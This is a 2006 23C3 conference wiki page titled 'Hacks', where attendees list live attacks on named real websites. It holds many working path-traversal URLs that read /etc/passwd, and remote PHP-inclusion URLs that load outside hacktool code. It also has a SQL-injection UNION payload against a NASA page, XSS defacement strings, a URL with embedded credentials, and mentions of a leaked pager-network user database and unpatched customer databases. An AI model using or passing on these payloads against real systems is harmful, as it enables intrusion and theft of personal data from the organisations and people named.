Hacks

From 23C3 Public Wiki

bad hacks

Remember: No harm to the network!

lol

My work just nullrouted some scriptkiddies :P

CTV Hacks - powered by !eof

Image #1

Image #2

Someone else "hacked" it, too. Dunno who it was. --codec

Why is changing a user-definable text a hack? lamers! :-) --PoCSascha

Since you are involved! (next time I change the password!) :-D --BugBlue

POC hacks - powered by !eof

  • fixed: The Asterisk server of POC doesn't check the external incoming numbers, but puts a 0 in front. If you put 1 zero in front of the local number (0110), the system will change it (not really sure) to 00110 and will later on (maybe at the Alcatel hardware) strip the 2 0's. This means it will display a local call number.
  • maybe fixed: the G5 computer of POC has/had a username test with password test
  • not tested: when abusing the Asterisk server from POC, they will block you at MAC address level. If you abuse it from outside, it will block the router.

reisecluster

Various, uh... tour operators with a slight problem with session IDs. Furthermore, an IIS5 on Windows 2000 is not exactly the best idea... how did it go? webservices on iis are like Russian roulette with a glock? Anyway... almost every form on the sites goes unfiltered to the MS-SQL DB. Well... an MS-SQL DB with the data of ALL the people who have travelled with the respective operators since the site was created... would be quite something nice... Oh yes... in the profiles on the sites you can embed JavaScript etc. JUST FINE.

Oh yes, they KNOW about the bugs... since, uh... April already.

Favorites:

ruf admin: 'the site is secure anyway'

'head admin' of all the sites: 'I know about the bugs, but they don't want to pay enough to have the bugs fixed.'

http://www.abireisen.de/

http://www.frosch-sportreisen.de/

http://www.ruf.de/

http://www.offaehrte.de/

http://www.sfi.de/

My favorite, though, is still http://www.ruf.de/index.html... especially... since I know that their admin is called Uwe... well... surely nobody tested a private page on the company server there...

NOC hacks - powered by !eof

The printers from the NOC helpdesks didn't have any password in the configuration. This is 'fixed'.

some other hacks

http://hannes:fnord2342@sputnik.congress.ccc.de - Sputnik RFID tracking ;-)
http://prosieben.de/club_community/community/index.php?commFile=/foren/channel.php&kat_id='
http://sharp.de/suche/suche.php?search_string=%27

https://wi.hexonet.net/wi/54cd/include.php?http://foobar.servegame.com/ (note: httpS)

Interesting: This domain hoster is housing JURIS, the German database of law and order :) Funny: It delivers our content with its own certificate (remote PHP inclusion is potentially possible)

MacTechnews.de

Jamba! http://www.jamba.de/jcw/search/searchContent.do?&keywords=&displayname=Gruesse%20vom%2023C3!%20:-)

Even Google! http://www.google.de/search?hl=de&q=Gruesse+vom+23C3

there is a small gallery @flickr ... http://www.flickr.com/photos/75149036@N00/

default password on ssl-vpn: the complete network was open until now. the users can work without problems. the new password was emailed to the admin.
https://www.storage-station.com/

btw. i hope this is ok for the ethik hotline which was not reachable.

Gdata

Bla? ;)

(both "fixed" by now)
http://www.microsoft.se/23C3
http://www.microsoft.dk/23C3

Blub? ;)

http://ich.will-ficken.info http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006/ there is more ...

Webklabauter PHP Hacktool remote inclusion :) http://www.sage.edu/current/handbook/sca/handbook.php?page=http://events.ccc.de/congress/2006-mediawiki/images/4/4d/Wkb2.gif&wkb=1# check out: http://metalab.at/wiki/Webklabauter

bild.de *g* http://bild.softonic.de/index.phtml?search=%22%3E%3Cdiv+style%3D%22position%3A+absolute%3B+height%3A+300px%3B+width%3A+300px%3B+top%3A+10px%3B+left%3A+200px%3B+background-color%3A+white%3B+border%3A+3px+solid+black%3B+color%3A+black%3B+padding%3A+10px%3B+font-size%3A+20px%3B%22%3E%3Ccenter%3EGruesse+aus+Berlin%21%3Cbr+%2F%3E%3Cbr+%2F%3E%3Cimg+src%3D%22http%3A%2F%2Fevents.congress.ccc.de%2Fcongress%2F2006-mediawiki%2F%2Fskins%2Ftrustme%2F23c3-logo.png%22%3E%3C%2Fcenter%3E%3C%2Fdiv%3E&body=1&id_section=2&id_section=2&adv_search=0&boolean=1&license=&rank=&date_actualized=

http://www.creativecow.net/show.php?page=/articles/solorio_marco/std_converter_rev/../../../../../../../../../../../etc/passwd

hostmaster@1und1.com, please fix the next 2:
http://www.vgf-online.de/index.php?id=103&no_cache=1&dlpath=etc http://www.browningteam-bayern.de/markt/Rollen/objekte/phpcksec.php?path=/proc/version

even more browsing fun:
http://www.witze-welt.de/index.php?page=../../../../../../../../../etc/passwd - very funny


Not having a shadow-file is a very bad idea :-/
http://www.ethik.uni-jena.de/02/index.php?file=../../../../../../../../etc/passwd
http://www.lufthansa-cargo.com/download.jsp?file=../../../../../../../../../../../../../../../../../../../../etc/passwd

ready to print: http://janine.homedns.org/printDutyRoster.php?file=/etc/passwd
downloading is more convenient: http://www.archis.ch/cgi-bin/wPermission.cgi?file=../../../../../../../../../../../../../../../../etc/passwd http://www.ghostwatcher.com/display.php?file=/etc/passwd
http://www.pitu.stm.sp.gov.br/download.php?file=/etc/passwd
http://www.laurentian.ca/sociology/index.php?file=../../../../../../../../etc/passwd
http://smt.dsa.fju.edu.tw/military%20defense/downloads/force-download.php?file=/etc/passwd
http://www.computrols.com/download.php?file=passwd&dir=/etc
http://www.stufr.de/xx/csc/include.php?file=/etc/passwd


http://climate.gsfc.nasa.gov/viewImage.php?id=-1%20UNION%20SELECT%200,0x32336333206f6e676f696e672e2e2e,2,0x3c696d67207372633d2268747470733a2f2f6576656e74732e636f6e67726573732e6363632e64652f636f6e67726573732f323030362d6d6564696177696b692f2f696d616765732f652f65632f323363335f3332307832343070785f32332e6a7067223e,4,5,6,7,8%20/**

Webcam:
Stuttgart Airport ?
http://195.243.185.195/view/index.shtml

oldschool

http://www.angelfire.com/funky/laneyards/ thinking of good old times ...

table bunny hack

http://picpaste.de/owned.JPG who can you trust? ... not us (=, sorry table bunny - awaiting your revenge!

realtime notification?

are you polling the Recent changes function for latest updates on this page and in the wiki? why not install a chat notification plug-in into the wiki, so we can hang out in an IRC channel or even jabber MUC and see in realtime when people edit stuff here? just a thought. --lynX

emessage.de / skyper user database

A SQLite DB with users of the German pager network Skyper / emessage has been seen on various FTP servers. Users can be searched here, the collected DB is e.g. here, if not, use the ftpsearch.


no hack just XSS :)

no hack just a strange checkPassword (having disabled javascript)

http://napoli.ipv6.telscom.ch/TelscomHomeEnvironment

need wordlist

need a wordlist (max. 5<8) characters. please answer here. many thanks.
md5: check [1] sorry, not a md5 hash list, a normal wordlist with numbers etcpp. look at http://packetstormsecurity.nl/Crackers/wordlists/ or wait ~5 mins and leech my wordlist from tigh.central-services.congress.ccc.de/test/need_wordlist_please/please/